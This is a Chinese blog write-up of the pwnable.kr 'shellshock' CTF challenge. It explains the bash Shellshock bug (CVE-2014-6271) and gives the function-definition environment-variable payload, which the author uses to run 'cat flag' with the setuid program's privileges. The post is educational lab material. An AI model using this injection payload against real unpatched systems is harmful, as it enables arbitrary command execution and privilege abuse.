pwnable 笔记 Toddler's Bottle - shellshock

最新推荐文章于 2020-05-31 02:52:39 发布
最新推荐文章于 2020-05-31 02:52:39 发布
阅读量735 收藏
点赞数
分类专栏: pwn pwnable.kr 题解 文章标签: pwnable bash CVE-2014-6271
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/smalosnail/article/details/53123242
版权

考察bash shellshock 漏洞 CVE-2014-6271

shellshock.c 

#include <stdio.h>
int main(){
        printf("%d\n",getegid());
        setresuid(getegid(), getegid(), getegid());
        setresgid(getegid(), getegid(), getegid());
        //system("/home/shellshock/bash -c 'echo shock_me'");
        return 0;
}

这个漏洞大概的意思是 

$ env a='() { :;}; echo vulnerable' bash -c 'echo 1'
在 echo vulnerable这里可以执行任意命令

利用这个漏洞,根据题目给的源代码,在执行shellshock时,权限由shellshock_pwn被设置为shellshock,于是有权限可以执行cat flag查看flag

$ env a='() { :;}; bash -c "cat flag"' ./shellshock


TaQini852
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Toddler-care-website:使用 Django 的互联网编程实验室迷你项目
08-04
幼儿护理网站 -------互联网编程实验室迷你项目------- 这是一个使用 Django 框架构建的网站,用于聘请保姆和订购产品来照顾幼儿。
Toddler Tap-开源
07-20
一个针对看到您使用键盘并希望这样做的幼儿的项目。 在其当前配置中,该项目将显示一个项目、单词并说出与按下的键相关的单词。
pwnable.kr --- shellshock题解(bash破壳漏洞)
Yannie's Blog
12-17 294
程序代码如下 #include &amp;amp;lt;stdio.h&amp;amp;gt; int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid()); system(&amp;quot;/home/shellshock/bash -c 'echo shock...
pwnable 笔记 Toddler's Bottle -passcode
pumpkin9
04-01 208
题目 用ssh连接一下 运行一下passcode 竟然发现错误。。 可以发现需要输入 name passcode1 passcode2 再查看一下源代码 这个题一共有两个函数welcome()和login() welcome中输入了name,并且字符串大小是100 login中输入了pass code1 和passcode2 在passcode1=338150(0...
pwnable 笔记 Toddler's Bottle - cmd2
HiTaQini
11-11 776
这题过滤的条件更加严格了,增加了对/的过滤,也就是说输入目录都会被过滤掉,这样通过字符拼接绕过过滤就很难了
pwnable 笔记 Toddler's Bottle - collision
HiTaQini
11-16 1075
程序源码题目分析分析一下程序源代码,发现需要输入一个长度正好为20的字符串作为参数。 check_password()中将这个长度为20的字符串分为5部分,每一部分4字节,并将这4字节转化成整型数求和,求和结果和hashcode作比较,hashcode = 0x21DD09EC,如果相等就打印flag。 解题思路...
A Toddler Game-开源
05-26
幼儿游戏(1-4岁),可教授字母和数字的声音,并具有其他基本的教育内容。 这是使用SDL用C#编写的。 它是在Linux上编写的,但应在具有Mono(或.NET)和SDL的任何文件上运行。
Kids Key - Alphabet Training for Toddler-开源
04-28
一个适合小孩(1-4岁)的简单“游戏”,它使用字母和骑车颜色来帮助教导和增强ABC的颜色和数字。 这是向幼儿和父母可以理解并从中受益的简单计算迈出的一步。
toddler-ng:下一代Toddler,一款精心设计的可用便携式微内核操作系统
03-05
幼儿下一代幼儿主要目标用C99编写...并兼容多引导更多架构-OpenRISC,HPPA,SuperH,IA64,s390,VAX状态计划=尚未开始初始=初步探索活动=积极开发当前=最新拱目标装载机哈尔笔记ia32-pc-multiboot 当前的积极的需进行
PEDA用法总结
热门推荐
HiTaQini
11-13 2万+
PEDA用法总结 一个强大的GDB插件  PEDA是为GDB设计的一个强大的插件,全称是Python Exploit Development Assistance for GDB。它提供了很多人性化的功能,比如高亮显示反汇编代码、寄存器、内存信息,提高了debug的效率。同时,PEDA还为GDB添加了一些实用新的命令,比如checksec可以查看程序开启了哪些安全机制等等,后续会介绍.
scanf忘记加'&'危害有多大? 详解GOT表覆写攻击技术
HiTaQini
11-20 8559
初学C语言时,大家有没有遇到过这样的情景? 在使用`scanf()`函数时,忘记加取地址符号`&`. 结果程序报错,debug了半天,恍然发现,原来是忘记加坑爹的`&`。 本文通过讲解一道pwnable.kr上的got表覆写题目,详细的解读GOT覆写技术,讲一讲`scanf`不加`&`到底有多坑。
初探ROP攻击 Memory Leak & DynELF
HiTaQini
11-28 6061
前言通过泄露内存的方式可以获取目标程序libc中各函数的地址,这种攻击方式可以绕过地址随机化保护。下文通过一个例子讨论泄露内存的ROP攻击。 (ps.本文中的源代码大家可以去我的Github中下载,链接在文章结尾。实践才会出真知啊~)
CTFd一键部署Pwn题目动态靶机
HiTaQini
04-01 5641
pwn-docker是我写的一个用于自动生成pwn题目docker镜像的脚本,功能如下:1. 使用ctf_xinetd控制权限; 2.动态靶机环境+动态flag(由CTFd-whale生成)3.无需修改配置,一键生成镜像
手把手教你写纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南
HiTaQini
05-31 4968
ascii shellcode : 自动生成shellcode,手写shellcode
pwnable 笔记 Rookiss - fsb - 20 pt
HiTaQini
12-17 3109
典型的格式化字符串漏洞
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3052
终于打到第二关了... 这题考察GOT覆写
pwnable 笔记 Toddler's Bottle - passcode
HiTaQini
11-03 2879
这题涉及到GOT覆写技术,我更新了一篇讲GOT覆写的文章,以这道题做的例子,讲的比较详细,大家可以参考一下: http://blog.csdn.net/smalosnail/article/details/53247502
RCTF - Exploitation 200 welpwn - writeup
HiTaQini
12-02 2872
RCTF 2015 welpwn 200 linux 64位 栈溢出 ROP + leak libc
字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转为java数组
最新发布
12-07
以下是将字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转换为Java数组的代码示例: ```java String[] strArr = {"Baby",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TaQini852

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值